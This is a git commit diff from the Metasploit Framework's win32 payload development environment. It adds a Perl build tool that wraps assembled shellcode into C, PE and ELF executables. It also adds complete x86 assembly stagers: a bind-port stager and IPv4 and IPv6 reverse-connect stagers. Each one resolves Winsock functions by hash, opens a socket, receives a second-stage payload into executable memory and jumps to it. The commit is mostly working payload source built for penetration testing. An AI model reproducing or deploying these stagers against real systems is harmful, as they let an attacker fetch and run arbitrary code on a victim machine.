Updated README, include the templates and other src
git-svn-id: file:///home/svn/framework3/trunk@5637 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ed379dddf5
commit
7d2bb9536a
|
@ -1,7 +1,7 @@
|
|||
This directory contains the win32 payload development environment used
|
||||
for creating the payloads in version 3 of the Metasploit Framework.
|
||||
|
||||
The 'nasm' executable must be in your path to use the included build tool.
|
||||
The 'nasm' executable must be in your path to use the included build.sh tool.
|
||||
|
||||
The included 'build' script automatically creates a number of file types
|
||||
each time it used to compile a payload. These file types are:
|
||||
|
@ -13,6 +13,6 @@ each time it used to compile a payload. These file types are:
|
|||
|
||||
The PE executable templates were developed by 'rix' and used with permission.
|
||||
|
||||
To use this script, simply run ./build <name of payload>, where the name
|
||||
To use this script, simply run ./build.sh <name of payload>, where the name
|
||||
does not include the ".asm" suffix. To build win32_stage_api.asm, the
|
||||
command line would be "./build win32_stage_api".
|
||||
command line would be "./build.sh win32_stage_api".
|
||||
|
|
|
@ -0,0 +1,173 @@
|
|||
#!/usr/bin/perl
|
||||
###############
|
||||
|
||||
##
|
||||
# Name: build
|
||||
# Author: H D Moore <hdm [at] metasploit.com>
|
||||
# Description: Command-line tool for building/extracting asm payloads
|
||||
# License: GPL / Perl Artistic
|
||||
##
|
||||
|
||||
|
||||
my $name = shift();
|
||||
|
||||
if (! $name || $name =~ /\./) { print STDERR "Usage: $0 <name>\n"; exit(0); }
|
||||
|
||||
if ($name eq 'clean') {
|
||||
system("rm -f *.bin *.exe *.c *.elf");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
# Compile the asm
|
||||
unlink("$name.bin");
|
||||
system("nasm -f bin -O3 -o $name.bin $name.asm");
|
||||
|
||||
if (! -f "$name.bin") {
|
||||
exit(0);
|
||||
}
|
||||
|
||||
# Load binary
|
||||
my $bindata;
|
||||
open(X, "<$name.bin") || exit(0);
|
||||
$bindata = join('',<X>);
|
||||
close(X);
|
||||
|
||||
print "# Length: " . length($bindata) . " bytes\n";
|
||||
|
||||
|
||||
# Print out common offsets into the payload data
|
||||
my $suffix;
|
||||
my $port = index($bindata, pack("n", 8721));
|
||||
if ($port != -1) {
|
||||
print "# Port: $port\n";
|
||||
}
|
||||
|
||||
my $host = index($bindata, gethostbyname("127.0.0.1"));
|
||||
if ($host != -1) {
|
||||
print "# Host: $host\n";
|
||||
}
|
||||
|
||||
my $psize = index($bindata, pack("L", 0x12345678));
|
||||
if ($psize != -1) {
|
||||
print "# Size: $psize\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x13370000));
|
||||
if ($pstart != -1) {
|
||||
print "# Start: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x11223344));
|
||||
if ($pstart != -1) {
|
||||
print "# Alloc: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x73e2d87e));
|
||||
if ($pstart != -1) {
|
||||
print "# ExitProcess: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, pack("L", 0x4cf079fa));
|
||||
if ($pstart != -1) {
|
||||
print "# PayloadLen: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, "\x8d\x77\x15");
|
||||
if ($pstart != -1) {
|
||||
$pstart+=2;
|
||||
print "# FileStart: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, "\x88\x4f\x1a");
|
||||
if ($pstart != -1) {
|
||||
$pstart+=2;
|
||||
print "# FileEnd: $pstart\n";
|
||||
}
|
||||
|
||||
my $pstart = index($bindata, "http");
|
||||
if ($pstart != -1) {
|
||||
print "# URL Start: $pstart\n";
|
||||
}
|
||||
|
||||
|
||||
$x = BufferPerl($bindata);
|
||||
print $x;
|
||||
|
||||
$x = BufferC($bindata);
|
||||
my $cfile;
|
||||
while(<DATA>) { $cfile .= $_; }
|
||||
|
||||
$cfile =~ s/::SHELLCODE::/$x/g;
|
||||
|
||||
open(C, ">$name.c");
|
||||
print C $cfile;
|
||||
close (C);
|
||||
|
||||
# Build PE
|
||||
open (X, ">templates/payload.bin") || die "payload.bin: $!";
|
||||
print X $bindata;
|
||||
close (X);
|
||||
|
||||
chdir("templates") || die "chdir(templates): $!";
|
||||
unlink("../$name.exe");
|
||||
system("nasm -I inc/ -f bin -o ../$name.exe win32_template.asm");
|
||||
|
||||
# Build ELF
|
||||
unlink("linux_template.o");
|
||||
system("nasm -f elf -o linux_template.o linux_template.asm");
|
||||
if (-f "linux_template.o")
|
||||
{
|
||||
system("ld -o ../$name.elf linux_template.o");
|
||||
unlink("linux_template.o");
|
||||
}
|
||||
|
||||
unlink("payload.bin");
|
||||
system("chmod 755 *.exe *.elf");
|
||||
|
||||
sub BufferPerl
|
||||
{
|
||||
my ($data, $width) = @_;
|
||||
my ($res, $count);
|
||||
|
||||
if (! $data) { return }
|
||||
if (! $width) { $width = 16 }
|
||||
|
||||
$res = '"';
|
||||
|
||||
$count = 0;
|
||||
foreach my $char (split(//, $data))
|
||||
{
|
||||
if ($count == $width)
|
||||
{
|
||||
$res .= '".' . "\n" . '"';
|
||||
$count = 0;
|
||||
}
|
||||
$res .= sprintf("\\x%.2x", ord($char));
|
||||
$count++;
|
||||
}
|
||||
if ($count) { $res .= '";' . "\n"; }
|
||||
return $res;
|
||||
}
|
||||
|
||||
sub BufferC
|
||||
{
|
||||
my ($data, $width) = @_;
|
||||
my $res = BufferPerl($data, $width);
|
||||
if (! $res) { return }
|
||||
|
||||
$res =~ s/\.//g;
|
||||
return $res;
|
||||
}
|
||||
|
||||
__DATA__
|
||||
|
||||
char code[] =
|
||||
::SHELLCODE::
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int (*funct)();
|
||||
funct = (int (*)()) code;
|
||||
(int)(*funct)();
|
||||
}
|
|
@ -0,0 +1,203 @@
|
|||
; Title: Win32 API Loader
|
||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
|
||||
; Author: hdm[at]metasploit.com
|
||||
|
||||
[BITS 32]
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
call LKernel32Base
|
||||
|
||||
LGetProcAddress:
|
||||
push ebx
|
||||
push ebp
|
||||
push esi
|
||||
push edi
|
||||
mov ebp, [esp + 24]
|
||||
mov eax, [ebp + 0x3c]
|
||||
mov edx, [ebp + eax + 120]
|
||||
add edx, ebp
|
||||
mov ecx, [edx + 24]
|
||||
mov ebx, [edx + 32]
|
||||
add ebx, ebp
|
||||
|
||||
LFnlp:
|
||||
jecxz LNtfnd
|
||||
dec ecx
|
||||
mov esi, [ebx + ecx * 4]
|
||||
add esi, ebp
|
||||
xor edi, edi
|
||||
cld
|
||||
|
||||
LHshlp:
|
||||
xor eax, eax
|
||||
lodsb
|
||||
cmp al, ah
|
||||
je LFnd
|
||||
ror edi, 13
|
||||
add edi, eax
|
||||
jmp short LHshlp
|
||||
|
||||
LFnd:
|
||||
cmp edi, [esp + 20]
|
||||
jnz LFnlp
|
||||
mov ebx, [edx + 36]
|
||||
add ebx, ebp
|
||||
mov cx, [ebx + 2 * ecx]
|
||||
mov ebx, [edx + 28]
|
||||
add ebx, ebp
|
||||
mov eax, [ebx + 4 * ecx]
|
||||
add eax, ebp
|
||||
jmp short LDone
|
||||
|
||||
LNtfnd:
|
||||
xor eax, eax
|
||||
|
||||
LDone:
|
||||
pop edi
|
||||
pop esi
|
||||
pop ebp
|
||||
pop ebx
|
||||
ret 8
|
||||
|
||||
LKernel32Base:
|
||||
pop esi
|
||||
push byte 0x30
|
||||
pop ecx
|
||||
mov ebx, [fs:ecx]
|
||||
mov ebx, [ebx + 0x0c]
|
||||
mov ebx, [ebx + 0x1c]
|
||||
mov ebx, [ebx]
|
||||
mov ebx, [ebx + 0x08]
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0xec0e4e8e ; LoadLibraryA
|
||||
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
|
||||
mov edi, eax
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0x91afca54 ; VirtualAlloc
|
||||
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
|
||||
|
||||
; ebx = kernel32.dll base
|
||||
; esi = LGetProcAddress
|
||||
; edi = LoadLibraryA
|
||||
; eax = VirtualAlloc
|
||||
|
||||
sub esp, 0x100
|
||||
push eax ; [ebp + 12] = VirtualAlloc
|
||||
push edi ; [ebp + 8] = LoadLibraryA
|
||||
push esi ; [ebp + 4] = LGetProcAddress
|
||||
push ebx ; [ebp + 0] = kernel32.dll base
|
||||
|
||||
mov ebp, esp
|
||||
call LLoadWinsock
|
||||
|
||||
%define FN_RECV [ebp + 24]
|
||||
%define FN_SEND [ebp + 28]
|
||||
%define FN_ACCEPT [ebp + 32]
|
||||
%define FN_BIND [ebp + 36]
|
||||
%define FN_LISTEN [ebp + 40]
|
||||
%define FN_WSASOCK [ebp + 44]
|
||||
%define FN_WSASTART [ebp + 48]
|
||||
|
||||
LWSDataSegment:
|
||||
;========================
|
||||
dd 0x190 ; used by wsastartup
|
||||
dd 0xe71819b6 ; recv [ebp + 24]
|
||||
dd 0xe97019a4 ; send [ebp + 28]
|
||||
dd 0x498649e5 ; accept [ebp + 32]
|
||||
dd 0xc7701aa4 ; bind [ebp + 36]
|
||||
dd 0xe92eada4 ; listen [ebp + 40]
|
||||
dd 0xadf509d9 ; WSASocketA [ebp + 44]
|
||||
dd 0x3bfcedcb ; WSAStartup [ebp + 48]
|
||||
db "WS2_32", 0x00
|
||||
;========================
|
||||
|
||||
LLoadWinsock:
|
||||
pop ebx ; save address to data in ebx
|
||||
lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
|
||||
push ecx ; push address of "WS2_32.DLL"
|
||||
call edi ; call LoadLibraryA("WS2_32.DLL")
|
||||
mov edi, ebx ; store base of data section in edi
|
||||
mov ebx, eax ; store base of winsock in ebx
|
||||
lea esi, [ebp + 20] ; store base of function table
|
||||
push byte 0x07 ; load five functions by hash
|
||||
pop ecx ; configure the counter
|
||||
|
||||
Looper:
|
||||
push ecx ; save the counter
|
||||
push ebx ; dll handle
|
||||
push dword [edi + ecx * 4] ; function hash value
|
||||
call [ebp + 4] ; find the address
|
||||
pop ecx ; restore the counter
|
||||
mov [esi + ecx * 4], eax ; stack segment to store addresses
|
||||
loop Looper
|
||||
|
||||
LWSAStartup: ; WSAStartup (0x101, DATA)
|
||||
sub esp, [edi]
|
||||
push esp
|
||||
push dword [edi]
|
||||
call FN_WSASTART
|
||||
xor eax, eax
|
||||
|
||||
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
call FN_WSASOCK
|
||||
mov edi, eax
|
||||
|
||||
LBind:
|
||||
xor ebx, ebx
|
||||
push ebx
|
||||
push ebx
|
||||
push dword 0x11220002 ; port 8721
|
||||
mov eax, esp
|
||||
push byte 0x10 ; length
|
||||
push eax
|
||||
push edi
|
||||
call FN_BIND
|
||||
|
||||
LListen:
|
||||
push ebx
|
||||
push edi
|
||||
call FN_LISTEN
|
||||
|
||||
LAccept:
|
||||
push ebx
|
||||
push esp
|
||||
push edi
|
||||
call FN_ACCEPT
|
||||
mov edi, eax
|
||||
|
||||
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
|
||||
|
||||
push byte 0x40
|
||||
pop esi
|
||||
push esi ; PAGE_EXECUTE_READWRITE=0x40
|
||||
|
||||
shl esi, 6 ; MEM_COMMIT=0x1000
|
||||
push esi
|
||||
|
||||
shl esi, 8 ; 1MB
|
||||
push esi
|
||||
|
||||
push byte 0x00 ; NULL
|
||||
call [ebp+12]
|
||||
mov ebx, eax
|
||||
|
||||
|
||||
LRecvLength: ; recv(s, buff, 4, 0)
|
||||
push byte 0x00 ; flags
|
||||
push 4096 ; length
|
||||
push ebx ; buffer
|
||||
push dword edi ; socket
|
||||
call FN_RECV ; recv()
|
||||
call ebx
|
|
@ -0,0 +1,255 @@
|
|||
; Title: Windows Reverse Connect Stager (NX, IPv6)
|
||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
|
||||
; Author: Metasploit LLC
|
||||
|
||||
[BITS 32]
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
call LKernel32Base
|
||||
|
||||
LGetProcAddress:
|
||||
push ebx
|
||||
push ebp
|
||||
push esi
|
||||
push edi
|
||||
mov ebp, [esp + 24]
|
||||
mov eax, [ebp + 0x3c]
|
||||
mov edx, [ebp + eax + 120]
|
||||
add edx, ebp
|
||||
mov ecx, [edx + 24]
|
||||
mov ebx, [edx + 32]
|
||||
add ebx, ebp
|
||||
|
||||
LFnlp:
|
||||
jecxz LNtfnd
|
||||
dec ecx
|
||||
mov esi, [ebx + ecx * 4]
|
||||
add esi, ebp
|
||||
xor edi, edi
|
||||
cld
|
||||
|
||||
LHshlp:
|
||||
xor eax, eax
|
||||
lodsb
|
||||
cmp al, ah
|
||||
je LFnd
|
||||
ror edi, 13
|
||||
add edi, eax
|
||||
jmp short LHshlp
|
||||
|
||||
LFnd:
|
||||
cmp edi, [esp + 20]
|
||||
jnz LFnlp
|
||||
mov ebx, [edx + 36]
|
||||
add ebx, ebp
|
||||
mov cx, [ebx + 2 * ecx]
|
||||
mov ebx, [edx + 28]
|
||||
add ebx, ebp
|
||||
mov eax, [ebx + 4 * ecx]
|
||||
add eax, ebp
|
||||
jmp short LDone
|
||||
|
||||
LNtfnd:
|
||||
xor eax, eax
|
||||
|
||||
LDone:
|
||||
pop edi
|
||||
pop esi
|
||||
pop ebp
|
||||
pop ebx
|
||||
ret 8
|
||||
|
||||
LKernel32Base:
|
||||
pop esi
|
||||
push byte 0x30
|
||||
pop ecx
|
||||
mov ebx, [fs:ecx]
|
||||
mov ebx, [ebx + 0x0c]
|
||||
mov ebx, [ebx + 0x1c]
|
||||
mov ebx, [ebx]
|
||||
mov ebx, [ebx + 0x08]
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push dword 0xec0e4e8e ; LoadLibraryA
|
||||
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
|
||||
mov edi, eax
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push dword 0x91afca54 ; VirtualAlloc
|
||||
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
|
||||
|
||||
; ebx = kernel32.dll base
|
||||
; esi = LGetProcAddress
|
||||
; edi = LoadLibraryA
|
||||
; eax = VirtualAlloc
|
||||
|
||||
LBootWinsock:
|
||||
sub esp, 0x100
|
||||
push eax ; [ebp + 12] = VirtualAlloc
|
||||
push edi ; [ebp + 8] = LoadLibraryA
|
||||
push esi ; [ebp + 4] = LGetProcAddress
|
||||
push ebx ; [ebp + 0] = kernel32.dll base
|
||||
|
||||
mov ebp, esp
|
||||
call LLoadWinsock
|
||||
|
||||
%define FN_RECV [ebp + 24]
|
||||
%define FN_SEND [ebp + 28]
|
||||
%define FN_CONNECT [ebp + 32]
|
||||
%define FN_WSASOCK [ebp + 36]
|
||||
%define FN_WSASTART [ebp + 40]
|
||||
|
||||
LWSDataSegment:
|
||||
;========================
|
||||
dd 0x190 ; used by wsastartup
|
||||
dd 0xe71819b6 ; recv [ebp + 24]
|
||||
dd 0xe97019a4 ; send [ebp + 28]
|
||||
dd 0x60aaf9ec ; connect [ebp + 32]
|
||||
dd 0xadf509d9 ; WSASocketA [ebp + 36]
|
||||
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
|
||||
db "WS2_32", 0x00
|
||||
;========================
|
||||
|
||||
LLoadWinsock:
|
||||
pop ebx ; save address to data in ebx
|
||||
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
|
||||
push ecx ; push address of "WS2_32.DLL"
|
||||
call edi ; call LoadLibraryA("WS2_32.DLL")
|
||||
mov edi, ebx ; store base of data section in edi
|
||||
mov ebx, eax ; store base of winsock in ebx
|
||||
lea esi, [ebp + 20] ; store base of function table
|
||||
push byte 0x05 ; load five functions by hash
|
||||
pop ecx ; configure the counter
|
||||
|
||||
Looper:
|
||||
push ecx ; save the counter
|
||||
push ebx ; dll handle
|
||||
push dword [edi + ecx * 4] ; function hash value
|
||||
call [ebp + 4] ; find the address
|
||||
pop ecx ; restore the counter
|
||||
mov [esi + ecx * 4], eax ; stack segment to store addresses
|
||||
loop Looper
|
||||
|
||||
LWSAStartup: ; WSAStartup (0x0202, DATA)
|
||||
sub esp, [edi]
|
||||
push esp
|
||||
push dword 0x0202
|
||||
call FN_WSASTART
|
||||
xor eax, eax
|
||||
|
||||
LWSASocketA: ; WSASocketA (23,1,6,0,0,0)
|
||||
; dwFlags
|
||||
push eax
|
||||
|
||||
; RESERVED
|
||||
push eax
|
||||
|
||||
; PROTOCOL INFO
|
||||
push eax
|
||||
|
||||
; PROTOCOL: IPPROTO_TCP
|
||||
push byte 6
|
||||
|
||||
; TYPE: SOCK_STREAM
|
||||
push byte 1
|
||||
|
||||
; FAMILY: AF_INET6
|
||||
push byte 23
|
||||
|
||||
; WSASocket()
|
||||
call FN_WSASOCK
|
||||
mov edi, eax
|
||||
|
||||
; [ebp + 0] = kernel32.dll base
|
||||
; [ebp + 4] = LGetProcAddress
|
||||
; [ebp + 8] = LoadLibraryA
|
||||
; [ebp + 12] = VirtualAlloc
|
||||
; [ebp + 24] = recv
|
||||
; [ebp + 28] = send
|
||||
; [ebp + 32] = accept
|
||||
; [ebp + 36] = bind
|
||||
; [ebp + 40] = connect
|
||||
; [ebp + 44] = WSASocketA
|
||||
; [ebp + 48] = WSAStartup
|
||||
; [ebp + 52] = Payload Length
|
||||
|
||||
LConnect:
|
||||
call LGotAddress
|
||||
|
||||
LGetAddress:
|
||||
|
||||
; struct sockaddr_in6 {
|
||||
; short sin6_family;
|
||||
; u_short sin6_port;
|
||||
; u_long sin6_flowinfo;
|
||||
; struct in6_addr sin6_addr;
|
||||
; u_long sin6_scope_id;
|
||||
;}
|
||||
|
||||
; sin6_family
|
||||
db 0x17
|
||||
db 0x00
|
||||
|
||||
; sin6_port
|
||||
db 0xff
|
||||
db 0xff
|
||||
|
||||
dd 0x00000000 ; sin6_flowinfo
|
||||
|
||||
; fe80000000000000021b63fffe98bf36
|
||||
db 0xfe
|
||||
db 0x80
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x00
|
||||
db 0x02
|
||||
db 0x1b
|
||||
db 0x63
|
||||
db 0xff
|
||||
db 0xfe
|
||||
db 0x98
|
||||
db 0xbf
|
||||
db 0x36
|
||||
|
||||
dd 0x00000000 ; sin6_scope_id
|
||||
|
||||
LGotAddress:
|
||||
pop ecx
|
||||
push byte 28 ; address length
|
||||
push ecx
|
||||
push dword edi
|
||||
call dword FN_CONNECT
|
||||
|
||||
; reconnect on failure
|
||||
; test eax, eax
|
||||
; jne short LConnect
|
||||
|
||||
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
|
||||
|
||||
push byte 0x40
|
||||
pop esi
|
||||
push esi ; PAGE_EXECUTE_READWRITE=0x40
|
||||
|
||||
shl esi, 6 ; MEM_COMMIT=0x1000
|
||||
push esi
|
||||
|
||||
shl esi, 8 ; 1MB
|
||||
push esi
|
||||
|
||||
push byte 0x00 ; NULL
|
||||
call [ebp+12]
|
||||
mov ebx, eax
|
||||
|
||||
LRecvLength: ; recv(s, buff, 4, 0)
|
||||
push byte 0x00 ; flags
|
||||
push esi ; length
|
||||
push ebx ; buffer
|
||||
push dword edi ; socket
|
||||
call FN_RECV ; recv()
|
||||
call ebx
|
||||
|
|
@ -0,0 +1,203 @@
|
|||
; Title: Win32 API Loader
|
||||
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista,
|
||||
; Author: hdm[at]metasploit.com
|
||||
|
||||
[BITS 32]
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
call LKernel32Base
|
||||
|
||||
LGetProcAddress:
|
||||
push ebx
|
||||
push ebp
|
||||
push esi
|
||||
push edi
|
||||
mov ebp, [esp + 24]
|
||||
mov eax, [ebp + 0x3c]
|
||||
mov edx, [ebp + eax + 120]
|
||||
add edx, ebp
|
||||
mov ecx, [edx + 24]
|
||||
mov ebx, [edx + 32]
|
||||
add ebx, ebp
|
||||
|
||||
LFnlp:
|
||||
jecxz LNtfnd
|
||||
dec ecx
|
||||
mov esi, [ebx + ecx * 4]
|
||||
add esi, ebp
|
||||
xor edi, edi
|
||||
cld
|
||||
|
||||
LHshlp:
|
||||
xor eax, eax
|
||||
lodsb
|
||||
cmp al, ah
|
||||
je LFnd
|
||||
ror edi, 13
|
||||
add edi, eax
|
||||
jmp short LHshlp
|
||||
|
||||
LFnd:
|
||||
cmp edi, [esp + 20]
|
||||
jnz LFnlp
|
||||
mov ebx, [edx + 36]
|
||||
add ebx, ebp
|
||||
mov cx, [ebx + 2 * ecx]
|
||||
mov ebx, [edx + 28]
|
||||
add ebx, ebp
|
||||
mov eax, [ebx + 4 * ecx]
|
||||
add eax, ebp
|
||||
jmp short LDone
|
||||
|
||||
LNtfnd:
|
||||
xor eax, eax
|
||||
|
||||
LDone:
|
||||
pop edi
|
||||
pop esi
|
||||
pop ebp
|
||||
pop ebx
|
||||
ret 8
|
||||
|
||||
LKernel32Base:
|
||||
pop esi
|
||||
push byte 0x30
|
||||
pop ecx
|
||||
mov ebx, [fs:ecx]
|
||||
mov ebx, [ebx + 0x0c]
|
||||
mov ebx, [ebx + 0x1c]
|
||||
mov ebx, [ebx]
|
||||
mov ebx, [ebx + 0x08]
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0xec0e4e8e ; LoadLibraryA
|
||||
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
|
||||
mov edi, eax
|
||||
|
||||
push ebx ; kernel32.dll base
|
||||
push 0x91afca54 ; VirtualAlloc
|
||||
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
|
||||
|
||||
; ebx = kernel32.dll base
|
||||
; esi = LGetProcAddress
|
||||
; edi = LoadLibraryA
|
||||
; eax = VirtualAlloc
|
||||
|
||||
LBootWinsock:
|
||||
sub esp, 0x100
|
||||
push eax ; [ebp + 12] = VirtualAlloc
|
||||
push edi ; [ebp + 8] = LoadLibraryA
|
||||
push esi ; [ebp + 4] = LGetProcAddress
|
||||
push ebx ; [ebp + 0] = kernel32.dll base
|
||||
|
||||
mov ebp, esp
|
||||
call LLoadWinsock
|
||||
|
||||
%define FN_RECV [ebp + 24]
|
||||
%define FN_SEND [ebp + 28]
|
||||
%define FN_CONNECT [ebp + 32]
|
||||
%define FN_WSASOCK [ebp + 36]
|
||||
%define FN_WSASTART [ebp + 40]
|
||||
|
||||
LWSDataSegment:
|
||||
;========================
|
||||
dd 0x190 ; used by wsastartup
|
||||
dd 0xe71819b6 ; recv [ebp + 24]
|
||||
dd 0xe97019a4 ; send [ebp + 28]
|
||||
dd 0x60aaf9ec ; connect [ebp + 32]
|
||||
dd 0xadf509d9 ; WSASocketA [ebp + 36]
|
||||
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
|
||||
db "WS2_32", 0x00
|
||||
;========================
|
||||
|
||||
LLoadWinsock:
|
||||
pop ebx ; save address to data in ebx
|
||||
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
|
||||
push ecx ; push address of "WS2_32.DLL"
|
||||
call edi ; call LoadLibraryA("WS2_32.DLL")
|
||||
mov edi, ebx ; store base of data section in edi
|
||||
mov ebx, eax ; store base of winsock in ebx
|
||||
lea esi, [ebp + 20] ; store base of function table
|
||||
push byte 0x05 ; load five functions by hash
|
||||
pop ecx ; configure the counter
|
||||
|
||||
Looper:
|
||||
push ecx ; save the counter
|
||||
push ebx ; dll handle
|
||||
push dword [edi + ecx * 4] ; function hash value
|
||||
call [ebp + 4] ; find the address
|
||||
pop ecx ; restore the counter
|
||||
mov [esi + ecx * 4], eax ; stack segment to store addresses
|
||||
loop Looper
|
||||
|
||||
LWSAStartup: ; WSAStartup (0x101, DATA)
|
||||
sub esp, [edi]
|
||||
push esp
|
||||
push dword [edi]
|
||||
call FN_WSASTART
|
||||
xor eax, eax
|
||||
|
||||
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
inc eax
|
||||
push eax
|
||||
call FN_WSASOCK
|
||||
mov edi, eax
|
||||
|
||||
; [ebp + 0] = kernel32.dll base
|
||||
; [ebp + 4] = LGetProcAddress
|
||||
; [ebp + 8] = LoadLibraryA
|
||||
; [ebp + 12] = VirtualAlloc
|
||||
; [ebp + 24] = recv
|
||||
; [ebp + 28] = send
|
||||
; [ebp + 32] = accept
|
||||
; [ebp + 36] = bind
|
||||
; [ebp + 40] = connect
|
||||
; [ebp + 44] = WSASocketA
|
||||
; [ebp + 48] = WSAStartup
|
||||
; [ebp + 52] = Payload Length
|
||||
|
||||
LConnect:
|
||||
push 0x0100007f ; host: 127.0.0.1
|
||||
push 0x11220002 ; port: 8721
|
||||
mov ecx, esp
|
||||
push byte 0x10
|
||||
push ecx
|
||||
push dword edi
|
||||
call dword FN_CONNECT
|
||||
|
||||
; reconnect on failure
|
||||
; test eax, eax
|
||||
; jne short LConnect
|
||||
|
||||
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
|
||||
|
||||
push byte 0x40
|
||||
pop esi
|
||||
push esi ; PAGE_EXECUTE_READWRITE=0x40
|
||||
|
||||
shl esi, 6 ; MEM_COMMIT=0x1000
|
||||
push esi
|
||||
|
||||
shl esi, 8 ; 1MB
|
||||
push esi
|
||||
|
||||
push byte 0x00 ; NULL
|
||||
call [ebp+12]
|
||||
mov ebx, eax
|
||||
|
||||
LRecvLength: ; recv(s, buff, 4, 0)
|
||||
push byte 0x00 ; flags
|
||||
push esi ; length
|
||||
push ebx ; buffer
|
||||
push dword edi ; socket
|
||||
call FN_RECV ; recv()
|
||||
call ebx
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
These include files were pulled from rix's site:
|
||||
|
||||
http://www.devhell.org/~rix/
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,309 @@
|
|||
; MACROS FOR FUNCTION DECLARATIONS v0.9a
|
||||
; ======================================
|
||||
|
||||
|
||||
;gérer les appels de fonctions externes C (linux)
|
||||
;return() ?
|
||||
|
||||
|
||||
;FUNCTION.INC_CONVENTION = C|Std = convention d'appel des fonctions par défaut
|
||||
|
||||
|
||||
;FunctionDefine alias,C|Std|Pascal [,adresse]
|
||||
; -> FunctionDefine_alias = C|Std|Pascal
|
||||
; @alias = adresse de la fonction
|
||||
; alias$ (si aucun paramètre)
|
||||
; alias([p1,...]) (si plusieurs paramètres)
|
||||
|
||||
;Function alias, [,p1,...]
|
||||
; <- FunctionDefine
|
||||
; -> @alias = adresse de la fonction
|
||||
; Function_EBP ebp
|
||||
; Function_EIP byte ebp+4
|
||||
;[FunctionResd nom,nombre d]
|
||||
;[FunctionResw nom,nombre w]
|
||||
;[FunctionResb nom,nombre b]
|
||||
;...
|
||||
;FunctionBegin
|
||||
; <- Sub
|
||||
; ...
|
||||
;FunctionEnd
|
||||
; <- FUNCTION.INC_CONVENTION,BYTE.INC_NO_00
|
||||
|
||||
;FunctionCall alias, [,p1,...]
|
||||
; <- Push,Call,BYTE.INC_TEMPORARY_REGISTER(push & pop C)
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _FUNCTION.INC
|
||||
%define _FUNCTION.INC
|
||||
|
||||
%include "byte.inc"
|
||||
|
||||
%macro FUNCTION.INC 0
|
||||
BYTE.INC
|
||||
%define FUNCTION.INC_CONVENTION C
|
||||
%endmacro
|
||||
|
||||
%macro FUNCTION.INC~ 0
|
||||
BYTE.INC~
|
||||
%define FUNCTION.INC_CONVENTION C
|
||||
%endmacro
|
||||
|
||||
FUNCTION.INC
|
||||
|
||||
%macro FunctionDefine 2-3
|
||||
%define FunctionDefine_%1 %2
|
||||
%if %0==3
|
||||
%ifnidni %3,@%1
|
||||
%define @%1 %3
|
||||
%endif
|
||||
%endif
|
||||
%define %1$ FunctionCall %1
|
||||
%define %1(p1) FunctionCall %1,p1
|
||||
%define %1(p1,p2) FunctionCall %1,p1,p2
|
||||
%define %1(p1,p2,p3) FunctionCall %1,p1,p2,p3
|
||||
%define %1(p1,p2,p3,p4) FunctionCall %1,p1,p2,p3,p4
|
||||
%define %1(p1,p2,p3,p4,p5) FunctionCall %1,p1,p2,p3,p4,p5
|
||||
%define %1(p1,p2,p3,p4,p5,p6) FunctionCall %1,p1,p2,p3,p4,p5,p6
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10
|
||||
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11
|
||||
